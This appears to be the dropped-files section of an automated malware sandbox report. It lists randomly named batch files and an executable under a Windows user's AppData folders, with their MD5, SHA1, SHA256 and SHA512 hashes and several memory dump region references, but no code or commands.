SHA512 a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

MD5 773bdbbe3e641a349d737adddf1223c0
SHA1 682e313b914460eefe3e2cb7a09beeacd461c108
SHA256 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a
SHA512 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

MD5 1876c5d2f6209c7ca5db2b568ec8dc47
SHA1 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33
SHA256 e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755
SHA512 b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

memory/4944-36-0x0000000000A80000-0x0000000000CA4000-memory.dmp

memory/4944-37-0x000000001B7A0000-0x000000001B7BC000-memory.dmp

memory/4944-38-0x000000001BF30000-0x000000001BF80000-memory.dmp

memory/4944-39-0x000000001B7C0000-0x000000001B7D6000-memory.dmp

memory/4944-40-0x000000001BF80000-0x000000001BFD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat

MD5 b71d3786aee14d515a6f5a7deb4c5fd1
SHA1 3227e8f7dc07aa57f7caa246ae5f289e063aad74
SHA256 c9509ef6f7e57ad296f1c442fd538353b4f6f96d212856504891535f7b889569
SHA512 7a39593090fa20ffdcf288ddb636425e6f4dad0154a5ba55e92f4d3d3f9be45898f80b5a1220dcf051066278329b9108283e2785866cba0a608351191b0964db

memory/4048-86-0x000000001B5F0000-0x000000001B646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat

MD5 0435f0a3516c1543429468ac78260aa5
SHA1 0c791250982f563724d347aea6b40edd3aaa1070
SHA256 0ebac18fe2b35bf9c7505c49204a16c399cf8b9a5875ccbb9d601252117253af
SHA512 0fc492e72663b94af2267cabd3919ae865e3e1b98a8ab060a3a76e4623abf9070284e59cdded178c4555ea0cea1b485e92402a3a22da2dfb0ddf122c02e27d41

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

MD5 b20a84a0d572356548413fcf7e1c8ff1
SHA1 b02347fd036ce5c9df0cac4f8898e25c1bcef9b6
SHA256 9d2be47e92371e5abe5f070cce2cfeaed2018f85ff7b8f22849e9088e74df971
SHA512 d03b545a0bfcc79c1bd11f46bbec09e6cfa1159bd9b70fd297c3c847f7a397200d376098a486f23bab37fd487edff683fc0f798844d363ba41d2ae4cc7d02cef

C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat

MD5 d7ca49989aa6b1e8d5de9f553a9370c0
SHA1 73f3c05266d89e992057923197cf0f53251330da
SHA256 6566426a59b10f212938b9f268db906c0a0235f5acfb92c3f9ca25dfa3634e2f
SHA512 cc75cd31c7ebde22ece42c4dc15e8a10ce90bbdbe3946df1db83087de3a13a725bc952db582f71219423409f94fa16f7d62234ddf36946cb2d1c9923da07a5b0

C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat

MD5 3fac2909521a97a0721dd45b153fbf5d
SHA1 81e4aa7d209f6595dfd964d26991e5359b498d2b
SHA256 95e21f2b0339463e2b8c134819a370e1c0495142c8258b3c5c931f7bbecacd12
SHA512 6eebd64fec761ef5c51815b9918ea3ef139ae208af8bdb5eab30cb5dcbe064e4a9c9e8c4bf307f75f4b28861fb6afb3a35fdc9b66a224753938b0bdce611fb3f

C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat

MD5 02b40fab1f395c3dc558d404b3ef931b
SHA1 7c9ca81c91c7682c65d75d6030c9fbb117c4cf89
SHA256 80f1b050fa0e354f71589db99fd1ecb103b8a26976cdd5ccd83b86858896d32d
SHA512 ac8bb06ec498df876a415d7bf54234618c4f8c6f6489ab6620907aac399fcb544954ac13f2550e4eb2cffce18302d7fac8d398821c1942d85b33fc350c1c420a

C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat

MD5 e0d42a5447e75ec041cb9f5bffdaf4ec
SHA1 9a02ddf22749385d353da630aae1f6a2863afdfd
SHA256 6fd5cc8a902f1a481ce482a2ceedfb33cfb85ba3e8948917a39d4be3a7e8d4de
SHA512 fe1312dd3f741d406ffa5af0fff7177d3c6f102abde6c6d44c8e9b6391eb6f7cdf427c807b868629f174c57ea0c3435aa6f165d465dd9723ba5d5bf05fcc3ce4

C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat

MD5 a3ae517f38ae79a6d2fa73fc344ba68b
SHA1 2dfbced5bfc7b87bb13039e49e6b64a8408269d9
SHA256 74ed08dbf8034f799d14c2b004a190f32941f89d783ab0152fc966a357a8eb03
SHA512 940ba818bf6843197ee717415fc5c07b91783bf28b8698f7d83cef288376f49bfcc88b4bb052d7694b0270cc68bb1be6bfec8b2d1a08f0dfa6f6217053f3fd69

C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat

MD5 be03b65ee5a586260742d5b400f490e2
SHA1 57e1ab3579f64161d8508accc87e5bd9b976153d
SHA256 d4e1701bf6176359dd42a525175d2c7b8e4006c0884ba27e84deed78e563e438
SHA512 f1daebf1f0c00d6ae49a22a8ec5ae01a29cf753a293072a79dff47f222f3e30548ff03262d7bdc23cf3852dfc41585a3c6f7aeb315d2cb5e3d16484135f9c5c8

memory/4392-131-0x000000001AE50000-0x000000001AEA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat

MD5 d8f8f8c9c8942de946d54d40f2527d8a
SHA1 12a54720941c0a254287dca70a33acf71ca255d6
SHA256 92c965155ed8622a699507a199d1eaa2eefe6b55a432442f17588564406cb8c4
SHA512 79fef5609b70950a5d4d23b5ec8d94526ef264db28fb394d240f9e5e5747e4436f8e2f8a5064abc374afc8171d0c4a0a286293417d0588d92aa9e72921f87e3f

C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat

MD5 06b539d6a9da2069b07f06d56b78fad8
SHA1 ecfae9d7a5be859895d36c93e309d602f14cacab
SHA256 6e1f316f5653129958a8a7165c8011dfa07b88dd0de1296e4cf2d55b213990ba
SHA512 05706f934d4c3a09fe249b7dcd803fd72a315c3cbb86080cb914777d917364b4ebcc3cc0cbc92c57b275690e784259b55dd4d3ba1dbd805a23855a76626fda84

C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat

MD5 951d9e2b6bb6c2226bde8b7aa2d81f1e
SHA1 4430d5e127113b81c8ac11b49a1cab50307f20c1
SHA256 402f98979d38d51bc76d7d74e375adb1d71ee5b262c1f047147911367f0914eb
SHA512 e14c67adad4656043896f6a7a2d1d52112f9b1641dc2042de67497dfa76e53e68d3767995826ab942e8eeebdef47c51652958da15b3365cd13b0e8ae5799a3d5

memory/976-150-0x00000000026E0000-0x0000000002736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat

MD5 1cfcd21b46dc76c86039c4f9e05b01ff
SHA1 d81134539a21060e9a45b8f9bc5fe19294a4f273
SHA256 1acd3d9ac601d0953a834ac5ef3e51f50e02c0e1506e8a88cee39f1acc9d735d
SHA512 0bf710dc09f82e2458340ee14e60fd6fa19e04cb02e3b7d77b48159b0fd284e2bae2d90b07de3608730a62c6dfbe850e9eb75eb111d8555f99ea9313a861d3e3

C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat

MD5 f1390db6b412922820ad36f6f6ceae6f
SHA1 11310a88338f79cf374a9a12251579f8e6daf3b9
SHA256 7ddb6b8d9ea03c8352ffbf81dcae1bfa5ce3e3acbf860f4c229af610e1189605
SHA512 98b734048e74b308422df1f306fbfa2bc0118c94d6481d93ec35e9d0d2a4c48226038dbc35501e38c21fc105ff6442c2795a769a43fc6775ad48b671c07974c2

C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat

MD5 a057be178907b374ad8793ca7aa478be
SHA1 029c1e9f31008d34d59c6bbbc3c79ba5178e7cf7
SHA256 581702742101391ac48b2b26a2eaa6199990934b84abfe070fba5bfebed04bba
SHA512 fa72c3ccb46814e03e34796361a115a4d09b5e0278a6e16667a3d8bc392f667da69e0aee4332d1cfd89d525a3abfd089cb6987a0eb36d041ef12d11d3650a4a6

C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat

MD5 272139a27f07bb75d4c922cbc0e3ff22
SHA1 019c69a8fa94f6c579c6060bb61b4c7cd2a72b3e
SHA256 4f5c77dd5a2106057357e6537fec7659d32fdd1105d4ffef38b00179ce581f21
SHA512 26b968f6e2d7fae6f987d20c5308914dc287a240345d88dbd6df77f555f82e21cf7ab392d3d47a290a2a733e5f0032dff64f9c1c3e01b2e630120ef2935b84b8

C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat

MD5 08118e5e801f5c7cdef6c485a0aa71fa
SHA1 5956d7854460eaaf67caed2248ffda9f90e5e6f8
SHA256 5c718a423c0c22888c6a78f88bca9ad5e0ebe3f617c4ba6f068e9f26aa8a95c2
SHA512 129d141a43aabd2bffc244ab14fb708db57718477ac108080cc98849cdcc9f73572b06017c3cedde64b0ad2f302eb1ac3cfcfee5403a29fc4201b77ca1ceb8a9

C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat

MD5 3f0b8273509b654656b5e309a566eb73
SHA1 f7e750d2d5e2e2b862cae8c42293291a894cd3a6
SHA256 13ae5d3c2bff65076c6c478d351e488e92660f28678396b3457bed06123e3690
SHA512 829e48848e980fc0373e2de28252ad2cfcc15646faae359a51aae1920ca5b6e82b59378548a31fef8e1ae58acc1641b8245ab46708a413ad18b3962fc1c08967

C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat

MD5 f0ae2666fc43456f88f15513663ce68d
SHA1 753412eee83a6a70d1d503023d0b051a62e92f01
SHA256 98ba103a8ef13c9abb787036e3f939d5fbdda6a7e6e8ef97484db907446f94ff
SHA512 a6a30abea4ab0382aa90ff6eb4a18295142661ce274c26f41c6c16a6ed876e3339e93b9bc65a21a44618333b86d9ccc2dd2a20a5b5e5605f26c77967e2ab299f

C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat

MD5 0c68b8bf8541d2ba1156d3e2906f0dc1
SHA1 bca847270732e07d016980a9946f23d300c1813d
SHA256 1370e0d250e1aede938f94c4fad64aab114b30b025d3a3ef71dd37c264c63bc1
SHA512 d18b9fa4428e82d6f6ed55edd6d70acc61095fe20d124b4940941c8a42cf9b3c1c85b73cd1b74e37d72086e76b678287d206e592e4e0417cf969f3c180518288

C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat

MD5 f7d195b72a33e0acb208d55917daf1aa
SHA1 40cfc7f75d250cd10f9cb4c5fcb03d4d80ab55f2
SHA256 40623d8113d02447ce8d7689cc27e918fbc0012fbdb18eb90c0dcc2f147002a1
SHA512 ed1ba77376fabe62992b674c3bc449fce18ab89834d12bfbd47768cfef88402ff2a3457171e31066960b038d7e0bced538fc6069aa56f2485b2ccb9f35590bf4

C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat

MD5 6e6602b0cb6bb85722b6a40cbb06d055
SHA1 6c385ce1d0d75957c8b5ddc6e39804fe21fc4f0f
SHA256 15ee8c5a463d7a2e122025568088b508510289196ea9f850aa7191401b5d9ba9
SHA512 292ee848dae3ff701e2f00170b63027b9a7e7a9590f1999bb730c070a570aa528909d4dd14ff8fa6d4455743c8be7c97feb05b55918fb9ddf053fbed1b4396d5